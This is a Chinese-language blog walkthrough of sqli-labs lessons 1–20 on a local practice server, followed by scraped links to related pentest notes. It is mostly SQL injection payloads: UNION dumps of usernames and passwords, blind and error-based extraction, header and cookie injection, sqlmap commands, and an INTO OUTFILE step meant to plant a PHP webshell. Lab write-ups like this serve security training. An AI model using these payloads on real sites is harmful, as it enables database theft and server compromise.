_Zer0
_Zer0

[渗透笔记][sql注入] sqli-lab 1-20(Basic Challenges)

题解思路参考自其他博客
https://blog.csdn.net/sdb5858874/article/details/80727555
https://blog.csdn.net/qq_41420747/article/details/81836327

Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)

输入http://127.0.0.1/sqli-labs-master/Less-1/?id=1没有问题。
加一个单引号:http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27,,报错。
在这里插入图片描述
根据报错内容可以确定id的值应该是被单引号包围的,并且猜想sql语句为select * from ... where id= ' 1' .....

输入?id=-1' order by 3 --+没有错误,输入?id=-1' order by 4 --+报错,说明表中字段有3列。
(要输入一个不存在的id值,这样显示后续的信息比较方便吧)

输入?id=-1' union select 1,2,3 --+显示了2和3,说明只会显示两个位
接下来开始爆库、爆表、爆字段
?id=-1' union select 1,2,database() --+
[渗透笔记][sql注入] sqli-lab 1-20(Basic Challenges)_第1张图片
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
在这里插入图片描述
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
在这里插入图片描述

?id=-1' union select 1,2,group_concat(username) from security.users --+
?id=-1' union select 1,2,group_concat(password) from security.users --+
分别爆出用户名和密码

注意
这里如果在地址栏输入#结尾,在sql语句中发现没有#,.
原因是url中#号是用来指导浏览器动作的(例如锚点),对服务器端没有作用。所以,HTTP请求中不包括#
#号改成url的编码%23就可以了.
如果输入--(有空格),但是到了sql语句有会没有空格,原因是地址栏最后的空格会被无视。
综上:注释后面的语句应该使用--+(这里的加号会被转成空格)

—————————————————————————————————————
Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)

输入http://127.0.0.1/sqli-labs-master/Less-1/?id=1没有问题。
加一个单引号:http://127.0.0.1/sqli-labs-master/Less-1/?id=1',,报错。
加注释?id=1' --+依旧报错
输入?id=2-1?id=1效果一样,说明是数值型注入。

数值型注入的php语句是$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";就是把变量不加单引号放进sql语句里。

所以构造的payload就是在字符型的基础上把单引号去掉就可以了

—————————————————————————————————————
Less-3 GET - Error based - Single quotes with twist string (基于错误的GET单引号变形字符型注入)

输入http://127.0.0.1/sqli-labs-master/Less-3/?id=1没有问题。
加一个单引号:http://127.0.0.1/sqli-labs-master/Less-3/?id=1',,报错。
加注释?id=1' --+依旧报错。
加一个括号?id=1') --+又正常了,说明sql语句是(' ')类型。
剩下部分和less-1相同。

看下php代码$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";验证了上述猜测的格式

—————————————————————————————————————
Less-4 GET - Error based - Double Quotes - String (基于错误的GET双引号字符型注入)

输入http://127.0.0.1/sqli-labs-master/Less-4/?id=1没有问题。
加一个单引号:http://127.0.0.1/sqli-labs-master/Less-4/?id=1'没有问题。
加一个双引号:http://127.0.0.1/sqli-labs-master/Less-4/?id=1 ",报错了。
猜测存在双引号闭合。
加上注释http://127.0.0.1/sqli-labs-master/Less-4/?id=1" --+依旧报错,
再加上一个括号?id=1") --+, ok了,返回正常界面。
payload构造方法同上。

—————————————————————————————————————
Less-5 GET - Double Injection - Single Quotes - String (双注入GET单引号字符型注入)

输入http://127.0.0.1/sqli-labs-master/Less-5/?id=1
在这里插入图片描述

输入http://127.0.0.1/sqli-labs-master/Less-5/?id=1'
在这里插入图片描述
输入?id=1' --+显示正常
输入?id=1' union select 1,2,3 --+显示结果和?id=1相同,说明不存在页面没有显示位,无法使用联合查询注入。

这里使用布尔盲注
通常布尔盲注是应用在如果有错误不回显,而正确的话会回显,这里可以通过页面的显示结果进行布尔盲注。

首先爆库
首先判断库名长度?id=1' and length(database())=8 --+八个字母
?id=1' and left((select database()),1)='s'--+或者?id=1' and left(database(), 1)='s' --+来判断出库名,(就是从a到z进行遍历每一个字母)
?id=1' and left(database(), 2)='se' --+依次判断库名的每一个字母。

爆表名
?id=1' and left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='u' --+
通过修改limit 后面的值和left的参数,来找每一位的字符,最后找到表users。

爆字段(都一个道理了)
?id=1' and left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password' --+

爆用户名和密码(注意最好是按照id排序,这样用户名和密码可以对应起来)
?id=1' and left((select username from users order by id limit 0, 1), 1)='s' --+

—————————————————————————————————————
Less-6 GET - Double Injection - Double Quotes - String (双注入GET双引号字符型注入)

与Less-5类似,只需要把单引号闭合改为双引号闭合即可,其余操作相同。

这里采用另一种报错注入方式
基于floor报错的报错注入。floor()报错注入准确地说应该是floor,count,group by冲突报错。双注入报错查询,原理是count函数遇到group by会报错,将查询的一部分结果以报错的形式返回。
and (select 1 from (select count(*),concat((payload),floor(rand(0)*2))x from information_schema.tables group by x)a)
其中payload为你要插入的SQL语句

需要注意的是该语句将 输出字符长度限制为64个字符
sql语句要求在查询结果的基础上再执行查询时,必须给定一个别名。

解释:
floor(rand(0)*2)看了一篇博客没看明白,反正就这么用吧。
concat((payload), floor(rand(0)*2))x的x就是把查询的结果起一个别名,最后的a也是这个道理

输入?id=1" and (select 1 from (select count(*),concat((select group_concat(schema_name) from information_schema.schemata),floor (rand(0)*2))x from information_schema.tables group by x)a) --+
页面提示我输出信息超过一行,但我们已经使用了group_concat函数,说明这里数据库名组成的字符串长度超过了64位,所以只能使用limit来限制。

为了使以报错形式显示的信息和错误信息不混在一起,在concat中加一个区分的符号。
?id=1" and (select 1 from (select count(*),concat((select concat(schema_name,';') from information_schema.schemata limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

?id=1" and (select 1 from (select count(*),concat((select concat(table_name,';') from information_schema.tables where talble_schema='information_schema' limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

?id=1" and (select 1 from (select count(*),concat(((select concat(column_name,';') from information_schema.columns where table_name='ALL_PLUGINS' limit 0,1)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+
下面省略

补充
双查询注入形式上是两个嵌套的查询,即select …(select …),里面的那个select被称为子查询,他的执行顺序也是先执行子查询,然后再执行外面的select。

双注入的原理总的来说就是,当一个聚合函数后面出现group分组语句时,会将查询的一部分结果以报错的形式返回。

构造方法

?id=1 "and (select 1 from ()a) --+
?id=1 "and (select 1 from (select count(*), concat()x from information_schema.tables group by x)a) --+
?id=1 "and (select 1 from (select count(*), concat((select group_concat(schema_name) from information_schema.schemata), floor(rand(0)*2))x from information_schema.tables group by x)a) --+

—————————————————————————————————————
Less-7 GET - Dump into outfile - String (导出文件GET字符型注入)

http://127.0.0.1/sqli-labs-master/Less-7/?id=1正常
http://127.0.0.1/sqli-labs-master/Less-7/?id=1 and 1=2正常,不存在数值型注入
http://127.0.0.1/sqli-labs-master/Less-7/?id=1%27语法错误,字符型注入
http://127.0.0.1/sqli-labs-master/Less-7/?id=1%27)) --+恢复正常,成功闭合

题目提示导出文件,into outfile命令。
要使用这个命令必须要有file权限,我一开始就不知道这个,多次写入失败,无语。
mysql中输入show variables like '%secure%';secure_file_priv的值,如果为NULL,则需要修改my.ini,将这个键附上一个自己喜欢的路径就可以了。然后导出文件的话就要导出到这个目录里。

先使用?id=1')) union select 1,2,3 into outfile "D:\\phpstudy\\PHPTutorial\\WWW\\sqli-labs-master\\test.php"--+看下是否能够成功写入。
在这里插入图片描述
虽然报错,但是可以写入。

然后就把1,2,3中的任意一个换成php一句话木马
变成?id=1')) union select 1,2, "" into outfile "D:\\phpstudy\\PHPTutorial\\WWW\\sqli-labs-master\\test.php"--+

然后用菜刀链接,我这里菜刀链接一直显示正在载入路径,不知道为啥。。。

—————————————————————————————————————
Less-8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注)

http://127.0.0.1/sqli-labs-master/Less-8/?id=1
在这里插入图片描述
http://127.0.0.1/sqli-labs-master/Less-8/?id=1'
[渗透笔记][sql注入] sqli-lab 1-20(Basic Challenges)_第2张图片
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' --+
在这里插入图片描述
分析:如果有错误,不回显,如果没有错误,回显:You are in…
使用布尔盲注或者时间盲注
布尔盲注上面有提到过,
payload构造形式
?id=1' and length(database())=8 --+
?id=1' and left(database(),8)='security' --+

时间盲注使用了if条件表达式
payload构造形式
?id=1' and if(length(database())=8, sleep(3), 1) --+

这里使用sqlmap跑一下

sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-8/?id=1" --dbs --technique B --batch
可以爆出库名,但是往下就不成功了,不知道为啥,有大佬知道,麻烦告知一下。

–technique是为sqlmap中的注入技术,在sqlmap中其支持5中不同模式的注入

B:Boolean-based-blind (布尔型型注入)

E:Error-based (报错型注入)

U:Union query-based (联合注入)

S:Starked queries (通过sqlmap读取文件系统、操作系统、注册表必须 使用该参数,可多语句查询注入)

T:Time-based blind (基于时间延迟注入)

—————————————————————————————————————
Less-9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)

http://127.0.0.1/sqli-labs-master/Less-9/?id=1
http://127.0.0.1/sqli-labs-master/Less-9/?id=1'
http://127.0.0.1/sqli-labs-master/Less-9/?id=1 and 1=2
http://127.0.0.1/sqli-labs-master/Less-9/?id=1"
等等一系列方式,都是下面的反应
在这里插入图片描述
?id=1' and sleep(3) --+出现延迟。这里可能会问道:哪里有延迟啊,界面都没动过。
我一开始也是懵了半天,后来发现如果延迟的话,页面左上角会一直刷新,知道3秒后停止。
好了,判断存在时间盲注了,和布尔盲注差不多,上面也介绍过时间盲注,这里不再赘述了,(其实是自己不想做了)

这里附上sqlmap的命令,不得不说时间盲注太费时间了。
sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-9/?id=1 --dbs --technique T --batch

—————————————————————————————————————
Less-10 GET - Blind - Time based - double quotes (基于时间的双引号盲注)

和第九题类似,只不过把单引号闭合改成了双引号闭合。
http://127.0.0.1/sqli-labs-master/Less-10/?id=1" and sleep(5) --+

sqlmap命令同第九题

—————————————————————————————————————
Less-11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入)

输入									结果
1										正常
1'										报语法错误
1' #									正常
1' or 1=1 #								登录成功

可以使用联合注入方式,注意联合查询最好把id设置成不存在的值
-1' union select 1,database() #
上面已经介绍过了,这里不重复了吧。

这里用一种新的注入方式,是报错注入中的一种方法,基于 extractvalue() 函数
因为它可以把查询到的信息以报错的方式回显到页面。

extractvalue() 是一个对XML文档进行查询的函数, 功能是从目标XML中返回包含所查询值的字符串。

用法extractvalue(目标xml文档,xml路径)注意xml路径必须是Xpath格式的字符串。

extractvalue注入的原理:extractvalue的第二个参数要求是xpath格式字符串,而我们输入的并不是。所以报错。

payload构造:and extractvalue(null,concat(0x7e,(select @@datadir),0x7e)); (0x7e 就是~的ascii码值)、null也有人用1

爆库
1' and extractvalue(null, concat(0x7e, database(), 0x7e))#
爆表
1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'), 0x7e)) #
爆字段
1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'), 0x7e)) #
在这里插入图片描述
只会显示这些内容,没有需要的字段名。
有一点需要注意,extractvalue()能查询字符串的最大长度为32,就是说如果我们想要的结果超过32,就需要用substring()函数截取,一次查看32位。
1' and extractvalue(1,concat(0x7e,substring(hex((select group_concat(column_name) from information_schema.columns where table_name='users')), 1,32), 0x7e)) #
修改substring参数可以实现查找全部信息。

—————————————————————————————————————
Less-12 POST - Error Based - Double quotes- String-with twist (基于错误的双引号POST型字符型变形的注入)

可以用基于extractvalue报错注入
爆库 1") and extractvalue(null, concat(0x7e, database(), 0x7e)) #
下面方法同less-11

这里学习另一种报错注入,基于updatexml函数的报错注入

updatexml(XML_document, XPath_string, new_value); 这个也是mysql里的修改函数
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。
第三个参数:new_value,String格式,替换查找到的符合条件的数据

updatexml的爆错原因是第二个参数需要的是Xpath格式的字符串。我们输入的显然不符合。故报错由此报错。
updatexml的最大长度是32位的,超过32位可以用substr打出来。

payload构造
and updatexml(1,concat(null,(database()),null),1);

这道题从爆库开始
1") and updatexml(1,concat(0x7e,database(),0x7e),1) #
下面不想做了,和上面差不多,感觉自己太菜了,心累。

—————————————————————————————————————
Less-13 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)

尝试后判断是')闭合,登录没有回显,联合查询没有回显,不能使用联合查询注入。

可以使用基于extractvalue报错注入方式,payload构造
1') and extractvalue(1, concat(0x7e, database(),0x7e)) #

也可以使用updatexml报错注入方式,payload构造
1') and updatexml(1,concat(0x7e, database(),0x7e),1) #

也可以使用时间盲注, payload构造
1') and if(length(database())=8, sleep(3), 1) #
方法上面都已经有了,不详细做了。

sqlmap跑一下报错注入,命令sqlmap.py -u http://127.0.0.1/sqli-labs-master/Less-13/?uname=admin --dbs --technique E --batch
失败了,不知道原因的失败了。。。。有大佬知道怎么回事的麻烦告知一下。

—————————————————————————————————————
Less-14 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)

双引号闭合,其他和less-13一样,payload构造
1" and extractvalue(1, concat(0x7e,database(),0x7e)) #
1" and extractvalue(1, concat(0x7e,select group_concat(table_name) from information_schema.tables where table_schema=database(),0x7e)) #
1" and extractvalue(1, concat(0x7e,substr(hex(select group_concat(table_name) from information_schema.tables where table_schema=database()), 1, 32),0x7e)) #

—————————————————————————————————————
less-15 POST - Blind- Boolian/time Based - Single quotes (基于bool型/时间延迟单引号POST型盲注)

布尔盲注
1' or length(database())=8 #
1' or (ascii(substr(database(),1,1)) = 115)#
1' or (database()='security') #
1' or (substr(select group(table_name) from infromation_schema.tables where table_schema='security', 1, 1)='x') #

时间盲注
admin' and sleep(3) #' and sleep(3) --+出现延迟。
接着用if表达式就可以了。
不知道这为啥必须是admin才会产生延迟,如果写个1就不可以。

—————————————————————————————————————
Less-16 POST - Blind- Boolian/Time Based - Double quotes (基于bool型/时间延迟的双引号POST型盲注)

和less-15类似,单引号改为上引号即可。

—————————————————————————————————————
Less-17 POST - Update Query- Error Based - String (基于错误的更新查询POST注入)

用户名必须是admin(不知道为啥),然后在password一栏构造基于updatexml报错的报错注入,payload

1' and updatexml(1,concat(0x7e,(database()),0x7e),1) #
1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) #
1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1) #

—————————————————————————————————————
Less-18 POST - Header Injection - Uagent field - Error based (基于错误的用户代理,头部POST注入)

在这里插入图片描述
这次用户名和密码都被过滤了,所以从页面上的输入框是不能注入了。
在这里插入图片描述
但是可以从user-agent利用报错注入。
payload和上面的差不多,我这里访问的本地网址,burp抓不到包(不知道是不是这个原因),所以就不做了。

看到后面也有几道题涉及到抓包,所以百度了一下,说是通过ipconfig找到本机的ip地址,然后访问这个ip下的slqi实验目录就可以用burp进行抓包了,试了一下成功了。

—————————————————————————————————————
Less-19 POST - Header Injection - Referer field - Error based (基于头部的Referer POST报错注入)

同18题差不多,只不过注入点从user-agent换成了referer
在这里插入图片描述
在这里插入图片描述
[渗透笔记][sql注入] sqli-lab 1-20(Basic Challenges)_第3张图片
一开始用户名和密码随便输入的,然后就去改referer,但是没反应。
后来看了一下.php文件,发现只有在登录成功的时候才会执行变量insert的语句。
所以就从数据库里面找了一对先登录,再去改referer。(不知道别人怎么知道用户名和口令的)

—————————————————————————————————————
Less-20 POST - Cookie injections - Uagent field - Error based (基于错误的cookie头部POST注入)

登录一下,用burp抓包,发现有cookie信息,在看php代码,insert语句也是用的cookie,那就把payload放在cookie上面就好了。
在这里插入图片描述
方法一样,不做了。

你可能感兴趣的:(渗透笔记)

  • python安全渗透笔记 红云谈安全 python编程学习python安全
    Python学习python常见错误UnicodeDecodeError:‘gbk’codeccan’tdecodebyte0x8cinposition22:illegalmultibytesequence//打开的文件未编码encoding='UTF-8'expectedanindentedblock未缩进,ifforcontinue又进入一次新的循环%将其他变量置入字符串特定位置以生成新字符串
  • vulnhub靶机-CyberSploit:1渗透笔记 liver100day 靶机学习安全漏洞渗透测试靶机
    文章目录1.环境搭建2.信息收集2.1主机发现2.2端口扫描2.3访问80端口(http服务)2.4爆破目录3.漏洞利用3.1ssh登录4.提权1.在kali里面搜索有无该版本的漏洞利用文件2.将文件保存到本地(若不指定文件保存目录的话,文件保存的位置为你当前路径)3.使用python搭建一个简易的服务器4.控制ssh下载漏洞利用文件5.编译漏洞利用文件并执行提权5.总结1.环境搭建靶机环境搭建攻
  • 零基础到精通Web渗透测试的学习路线 网安福宝 网络安全渗透测试渗透测试学习web渗透web安全渗透测试从入门到精通
    Web安全相关概念熟悉基本概念(SQL注入、上传、XSS、CSRF、一句话木马等)。1.通过关键字(SQL注入、上传、XSS、CSRF、一句话木马等)进行Google/SecWiki;2.阅读《精通脚本黑客》,虽然很旧也有错误,但是入门还是可以的;3.看一些渗透笔记/视频,了解渗透实战的整个过程,可以Google(渗透笔记、渗透过程、入侵过程等);熟悉渗透相关工具熟悉AWVS、sqlmap、Bur
  • 零基础学习网络安全/web安全【全网最全】 网络安全乔妮娜 学习web安全安全网络安全服务器网络
    我先把自己整理的web安全自学路线贴出来,有需要的可以保存一下:1、Web安全相关概念(2周)熟悉基本概念(SQL注入、上传、XSS、CSRF、一句话木马等)。通过关键字(SQL注入、上传、XSS、CSRF、一句话木马等)进行Google/SecWiki;阅读《精通脚本黑客》,虽然很旧也有错误,但是入门还是可以的;看一些渗透笔记/视频,了解渗透实战的整个过程,可以Google(渗透笔记、渗透过程、
  • 渗透笔记 (第一天 ) 学网安的小菜鸡 渗透课程笔记安全web安全
    基础操作系统和渗透名词渗透名词poc概念验证漏洞证明验证exp利用利用系统漏洞进行攻击动作唯一性payload有效载荷在目标系统执行的代码和指令(通道)shellcodeshell代码payload的一种建立正向和反向的名字(漏洞载荷的代码)wehshell网页后门系统后门软件后门木马病毒远程控制病毒破坏性程序反弹权限返回到ip上回显跳板中介abca通过b搞cb这就是跳板黑白盒测试黑没有源代码只要
  • vulnhub靶机Android4渗透笔记 liver100day 学习kali漏洞原理与分析安全adb安卓扫描测试工具android
    靶机下载/安装靶机下载:https://www.vulnhub.com/entry/android4-1,233/Android4靶机IP:未知攻击者IP:192.168.75.128下载好后打开如下图:需要输入密码,但是我们并不知道密码1主机发现因为是搭建靶机进行渗透,使用netdiscover命令查询目标靶机IP地址目标靶机IP地址为:192.168.75.136我们还可以用nmap尝试进行查
  • vulnhub靶机DriftingBlues: 2渗透笔记 liver100day 靶机学习安全渗透测试靶机
    文章目录环境准备1.信息收集1.1主机发现1.2端口扫描1.3访问80端口(http服务)2.漏洞利用2.1ftp匿名登录漏洞2.2爆破目录2.3使用wpscan爆破用户名与密码反弹shell2.4使用msf获取shell3.提权4.总结环境准备靶机环境搭建攻击渗透机:kaliIP地址:192.168.33.128靶机:DriftingBlues:2IP地址未知靶机下载地址:https://www
  • vulnhub靶机DriftingBlues: 1渗透笔记 liver100day 靶机学习安全渗透测试靶机
    文章目录环境准备渗透过程1.信息收集1.1主机发现1.2端口扫描1.4访问80端口(http服务)1.3目录爆破2.漏洞利用(暴力破解)3.提权4.总结环境准备靶机环境搭建攻击渗透机:kaliIP地址:192.168.33.128靶机:DC-7IP地址未知靶机下载地址:https://www.vulnhub.com/entry/driftingblues-1,625/渗透过程1.信息收集1.1主机
  • 内网渗透笔记 Darkid-98 安全网络安全
    内网渗透思路通过域成员主机,定位出域控制器IP及域管理员账号,利用域成员主机作为跳板,扩大渗透范围,利用域管理员可以登陆域中任何成员主机的特性,定位出域管理员登陆过的主机IP,设法从域成员主机内存中dump出域管理员密码,进而拿下域控制器、渗透整个内网。内网基础知识1、工作组:工作组是局域网中的一个概念,他是长久的资源管理模式。默认情况下使用工作组方式进行资源管理,将不同的computer按照不同
  • 内网渗透笔记之内网基础知识 夜未至 内网渗透Windows网络学习笔记服务器网络
    0x01内网概述内网也指局域网(LocalAreaNetwork,LAN)是指在某一区域内由多台计算机互联成的计算机组。一般是方圆几千米以内。局域网可以实现文件管理、应用软件共享、打印机共享、工作组内的历程安排、电子邮件和传真通信服务等功能。内网是封闭型的,它可以由办公室内的两台计算机组成,也可以由一个公司内的上千台计算机组成。列如银行、学校、企业工厂、政府机关、网吧、单位办公网等都属于此类。0x
  • vulnhub靶机AI-Web-1.0渗透笔记 Jokermans 安全web安全
    vulnhub靶机AI-Web-1.0渗透笔记开篇渗透过程①:信息收集②:SQL注入③:文件上传④:反弹shell⑤:提权⑥:获取flag总结前言:接下来一段时间应该都是会进行靶机的学习了,毕竟vulnhub的靶机挺不错的,和真实环境还是很像的开篇先贴一下这次靶机的下载地址:https://www.vulnhub.com/entry/ai-web-1,353/靶机下载完之后,vmware直接打开,
  • 【每日渗透笔记】文件上传绕过尝试 黑色地带(崛起) 0X07【web实战】web安全安全
    目录一、特点:1.1、特征:1.2、语言:1.3、正常上传的数据包:目前:问题:二、判断2.1、判断检测类型2.2、判断拦截工具三、绕过一、特点:1.1、特征:文件上传功能点1.2、语言:首先看见是java语言1.3、正常上传的数据包:目前:手动测试:1、发现会对filename和Content-Type进检测所以上传正常图片文件+木马代码上传成功,且返回了文件路径包含木马的图片2、上传的图片可以
  • funbox3靶场渗透笔记 夜yesir 笔记
    funbox3靶场渗透笔记靶机地址https://download.vulnhub.com/funbox/Funbox3.ova信息收集fscan找主机ip192.168.177.199.\fscan64.exe-h192.168.177.0/24____/_\_______________||__//_\/____/__|/__|'__/_`|/__||////_\\_____\__\(__||
  • 暗月内网靶场渗透笔记 Ba1_Ma0 web安全渗透web安全安全渗透测试内网渗透域渗透
    简介靶场下载地址:靶场地址:https://pan.baidu.com/share/init?surl=2pSYxSU-ZmurQ9--GFiaXQ提取码:3p47虚拟机网络设置:靶场拓扑图:靶机账号密码:信息收集内网扫描靶机就在本地,直接进行本地内网扫描即可,扫描当前网段:nmap-sP192.168.0.0/24只有这一台机子是IP未知的,其他设备都是自己的,故判断为目标靶机端口扫描因暗月靶机
  • CengBox3渗透笔记 北辰911 渗透学习linuxweb安全安全运维网络安全
    目录1.前言2.准备工作3.arp-scan主机发现4.网络扫描5.查看web指纹6.旁站查询7.目录爆破8.sql注入9.获取反弹shell10.提权10.1获取普通用户shell10.2获取root权限11.结语1.前言本文仅用于技术讨论与研究,不做任何导向,对于所有笔记中复现的这些终端、服务器或者实验环境,均为自行搭建的公开靶场,请勿在现实环境中模仿、操作。本文涉及到的工具仅就用到的方面做简
  • scaner从外网到内网域渗透笔记 夜yesir 靶机实战笔记安全服务器java运维
    scaner从外网到内网域渗透1.环境配置1.1靶场信息用到的虚拟机共有三个分别是12server-db、12-dc、web112server-db、web1这两个可以使用桥接或者nat模式根据需求可以设置网卡112-dc用的是VMnet19这台机子已经绑定ip主机名ip账号和密码[email protected]
  • 网络安全怎么学?才不会成为脚本小子? 网络安全-生 零基础学网络安全学习路线网络安全技能树web安全安全经验分享网络安全网络
    一,怎么入门?1、Web安全相关概念(2周)了解网络安全相关法律法规熟悉基本概念(SQL注入、上传、XSS、CSRF、一句话木马等)。通过关键字(SQL注入、上传、XSS、CSRF、一句话木马等)进行Google;阅读《精通脚本黑客》,虽然很旧也有错误,但是入门还是可以的;看一些渗透笔记/视频,了解渗透实战的整个过程,可以Google(渗透笔记、渗透过程、入侵过程等);2、熟悉渗透相关工具(3周)
  • 听劝 千万不要盲目自学网络安全 网络安全-生 网络安全技能树学习路线黑客工具职场和发展网络安全web安全程序员编程
    听劝不要什么盲目的学网络安全。一,怎么入门?1、Web安全相关概念(2周)了解网络安全相关法律法规熟悉基本概念(SQL注入、上传、XSS、CSRF、一句话木马等)。通过关键字(SQL注入、上传、XSS、CSRF、一句话木马等)进行Google;阅读《精通脚本黑客》,虽然很旧也有错误,但是入门还是可以的;看一些渗透笔记/视频,了解渗透实战的整个过程,可以Google(渗透笔记、渗透过程、入侵过程等)
  • vulnhub Hackathon2渗透笔记 听门外雪花飞 vulnhub靶机渗透linuxweb安全系统安全
    靶机下载地址:https://www.vulnhub.com/entry/hackathonctf-2,714/kaliip地址:192.168.20.130信息收集扫描靶机ip地址nmap-sP192.168.20.0/24确定靶机ip进行端口扫描nmap-A-p1-65535192.168.20.134首先我们使用匿名用户登录ftp看看有些啥(匿名用户密码为空)将两个文件下载下来看看在flag
  • vulnhub DC:3.2渗透笔记 听门外雪花飞 vulnhub靶机渗透php安全linux
    kaliip:192.168.20.130靶机下载地址:https://www.vulnhub.com/entry/dc-32,312/信息收集扫描靶机ip以及开放端口开放了80端口访问一下WelcometoDC-3.Thistime,thereisonlyoneflag,oneentrypointandnoclues.Togettheflag,you'llobviouslyhavetogainr
  • vulnhub靶机DC-1渗透笔记 liver100day 靶机学习漏洞原理与分析安全sshlinux
    靶机环境搭建:攻击渗透机:kaliIP地址:192.168.75.128靶机:DC-1IP地址下载地址:https://www.vulnhub.com/entry/dc-1,292/渗透过程1.信息收集1.1IP地址确认netdiscover可以确认目标靶机IP地址为192.168.75.141还可以使用arp-scan-l同样扫描出目标靶机IP地址1.2爆破端口信息既然知道了靶机的IP地址,那就
  • 红日安全内网渗透笔记 Ice吃米线 渗透测试CS域环境网络安全
    靶场下载地址:漏洞详情环境配置参考:【红日安全-VulnStack】ATT&CK实战系列——红队实战(二)-yokan-博客园此实战仅有3台机器DMZ区的WEB机、核心区的AD机、办公区的PC第一步:信息收集(模拟黑盒测试)已知WEB机的IP地址,用syn包进行扫描。nmap-sS-v192.168.111.80获得开放端口WEB服务器:Nmapscanreportfor192.168.111.8
  • vulnhub DC:2渗透笔记 听门外雪花飞 vulnhub靶机渗透安全网络web安全
    靶机下载地址:https://download.vulnhub.com/dc/DC-2.zipkaliip信息收集使用nmap扫描靶机ipnmap-sP192.168.20.0/24扫描开放端口nmap-A-p1-65535192.168.20.133发现80和7744端口开放访问80端口访问失败,发现dc-2的域名,将他添加到hosts文件中访问后发现第一个flag查看Wappalyzer发现的
  • vulnhub靶机Tr0ll:1渗透笔记 听门外雪花飞 vulnhub靶机渗透安全web安全linux
    Tr0ll:1渗透笔记靶场下载地址:https://www.vulnhub.com/entry/tr0ll-1,100/kaliip:192.168.20.128靶机和kali位于同一网段信息收集首先通过nmap扫描靶机ip地址nmap-sP192.168.20.0/24确定靶机ip扫描开放端口nmap-sV192.168.20.129发现21和80端口可能有用我们先来看看80端口并没有发现什么信
  • vulnhub mrRobot渗透笔记 听门外雪花飞 vulnhub靶机渗透web安全系统安全
    mrRobot渗透笔记靶机下载地址:https://www.vulnhub.com/entry/mr-robot-1,151/kaliip信息收集首先依旧时使用nmap扫描靶机的ip地址nmap-sP192.168.20.0/24扫描开放端口nmap-sV192.168.20.130开启了80,443端口我们尝试浏览器访问尝试使用dirb扫面目录dirbhttp://192.168.20.130/
  • vulnhub THE PLANETS: EARTH渗透笔记 听门外雪花飞 vulnhub靶机渗透网络web安全linux系统安全
    靶机下载地址:https://www.vulnhub.com/entry/the-planets-earth,755/#downloadkaliip地址信息收集nmap-sP192.168.20.0/24确定靶机ip地址扫描开放端口nmap-A-p1-65535192.168.20.131等待时间比较长,我们发现443端口有dns解析,我们修改一下hosts文件收集earth.local信息在网页
  • vulnhub 靶机 Kioptrix Level 1渗透笔记 听门外雪花飞 vulnhub靶机渗透安全
    靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/kaliip信息收集先使用nmap收集目标的ip地址nmap-sP192.168.101.0/24扫描开放端口nmap-A-p-192.168.101.20这时我们发现samba的绑定服务器的139端口我们使用msf探测一下他的版本msfconsolemsf6>useauxilia
  • vulnhub devguru渗透笔记 听门外雪花飞 vulnhub靶机渗透linux运维web安全系统安全
    靶机下载地址:https://vulnhub.com/entry/devguru-1,620/信息收集kaliip目标ip首先我们扫描一下开放端口nmap-A-p-192.168.20.143StartingNmap7.91(https://nmap.org)at2021-12-1810:41CSTNmapscanreportforbogon(192.168.20.143)Hostisup(0.0
  • vulnhub靶机DC-2渗透笔记 liver100day 学习靶机漏洞原理与分析sshgit安全漏洞
    靶机环境搭建攻击渗透机:kaliIP地址:192.168.75.128靶机:DC-2IP地址未知下载地址:http://www.five86.com/downloads/DC-2.zip渗透过程1信息收集1.1IP地址确认命令:arp-scan-l扫描局域网所有设备(所有设备IP、MAC地址、制造商信息)arp-scan命令:是一个用来进行系统发现的ARP命令行扫描工具(可以发现本地网络中的隐藏设
  • vulnhub Deathnote渗透笔记 听门外雪花飞 vulnhub靶机渗透php服务器linux
    靶机下载地址:http://www.vulnhub.com/entry/deathnote-1,739/此题如果要用vmware打开需修改网卡配置操作如下在这个页面按e,修改下图配置为按f10保存退出然后我们使用nano编辑/etc/network/interfaces文件内容按下ctrl+x会提示你是否保存按下Y重启虚拟机即可kaliip信息收集扫描靶机ipnmap-sP192.168.20.0
  • 设计模式介绍 tntxia 设计模式
    设计模式来源于土木工程师 克里斯托弗 亚历山大(http://en.wikipedia.org/wiki/Christopher_Alexander)的早期作品。他经常发表一些作品,内容是总结他在解决设计问题方面的经验,以及这些知识与城市和建筑模式之间有何关联。有一天,亚历山大突然发现,重复使用这些模式可以让某些设计构造取得我们期望的最佳效果。 亚历山大与萨拉-石川佳纯和穆雷 西乐弗斯坦合作
  • android高级组件使用(一) 百合不是茶 androidRatingBarSpinner
    1、自动完成文本框(AutoCompleteTextView) AutoCompleteTextView从EditText派生出来,实际上也是一个文本编辑框,但它比普通编辑框多一个功能:当用户输入一个字符后,自动完成文本框会显示一个下拉菜单,供用户从中选择,当用户选择某个菜单项之后,AutoCompleteTextView按用户选择自动填写该文本框。 使用AutoCompleteTex
  • [网络与通讯]路由器市场大有潜力可挖掘 comsci 网络
